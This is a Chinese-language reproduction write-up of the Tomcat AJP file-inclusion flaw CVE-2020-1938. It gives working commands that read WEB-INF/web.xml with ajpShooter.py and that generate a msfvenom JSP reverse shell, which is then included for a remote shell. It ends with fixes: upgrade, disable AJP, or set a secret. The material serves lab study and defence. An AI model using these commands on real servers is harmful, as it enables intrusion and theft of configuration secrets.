漏洞描述

由于Tomcat默认开启的AJP服务（8009端口）存在一处文件包含缺陷，攻击者可构造恶意的请求包进行文件包含操作，进而读取受影响Tomcat服务器上的Web目录文件。
漏洞相对鸡肋，外网Tomcat服务器一般不会开放ajp8009端口，内网横向使用效率太低。

漏洞编号

CVE-2020-1938
CNVD-2020-10487

影响版本

Apache Tomcat 6
Apache Tomcat 7 < 7.0.100
Apache Tomcat 8 < 8.5.51
Apache Tomcat 9 < 9.0.31

环境搭建

本地下载存在漏洞的版本，选择了Tomcat/8.5.0版本进行实验。
Tomcat历史版本下载
配置系统环境变量

CATALINA_BASE    安装路径
CATALINA_HOME    安装路径
Path     %CATALINA_HOME%\bin

startup启动服务，浏览器访问本地8080端口

复现过程

工具地址
常用两种利用方式：
1、通过AJP协议漏洞读取网站路径下的数据库配置文件，网站配置文件等敏感信息。
2、配合文件上传功能，包含执行上传的恶意代码。

读取WEB-INF/web.xml的内容。

python3 ajpShooter.py http://172.16.86.168:8080 8009 /WEB-INF/web.xml read

假设存在文件上传功能，上传任意后缀的恶意文件，使用文件包含getshell。
生成msf反弹jsp马。

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.2.146 LPORT=1234 R >text.txt

上传到当前网站目录下，包含执行恶意代码。

python3 ajpShooter.py http://172.16.86.168:8080/123 8009 /text.txt eval

msf成功接收到会话。

漏洞修复

1、升级无漏洞版本
2、在servce.xml中注释AJP，或者绑定到localhost

（1）编辑 <CATALINA_BASE>/conf/server.xml，找到如下行（<CATALINA_BASE> 为 Tomcat 的工作目录）：
<Connector port="8009"protocol="AJP/1.3" redirectPort="8443" />
（2）将此行注释掉（也可删掉该行）：
<!--<Connectorport="8009" protocol="AJP/1.3"redirectPort="8443" />-->
（3）保存后需重新启动Tomcat，规则方可生效。

3、若需使用Tomcat AJP协议，可根据使用版本配置协议属性设置认证凭证。

使用Tomcat 7和Tomcat 9的用户可为AJP Connector配置secret来设置AJP协议的认证凭证。例如（注意必须将YOUR_TOMCAT_AJP_SECRET更改为一个安全性高、无法被轻易猜解的值）：
<Connector port="8009"protocol="AJP/1.3" redirectPort="8443"address="YOUR_TOMCAT_IP_ADDRESS" secret="YOUR_TOMCAT_AJP_SECRET"/>

使用Tomcat 8的用户可为AJP Connector配置requiredSecret来设置AJP协议的认证凭证。例如（注意必须将YOUR_TOMCAT_AJP_SECRET更改为一个安全性高、无法被轻易猜解的值）：
<Connector port="8009"protocol="AJP/1.3" redirectPort="8443"address="YOUR_TOMCAT_IP_ADDRESS"requiredSecret="YOUR_TOMCAT_AJP_SECRET" />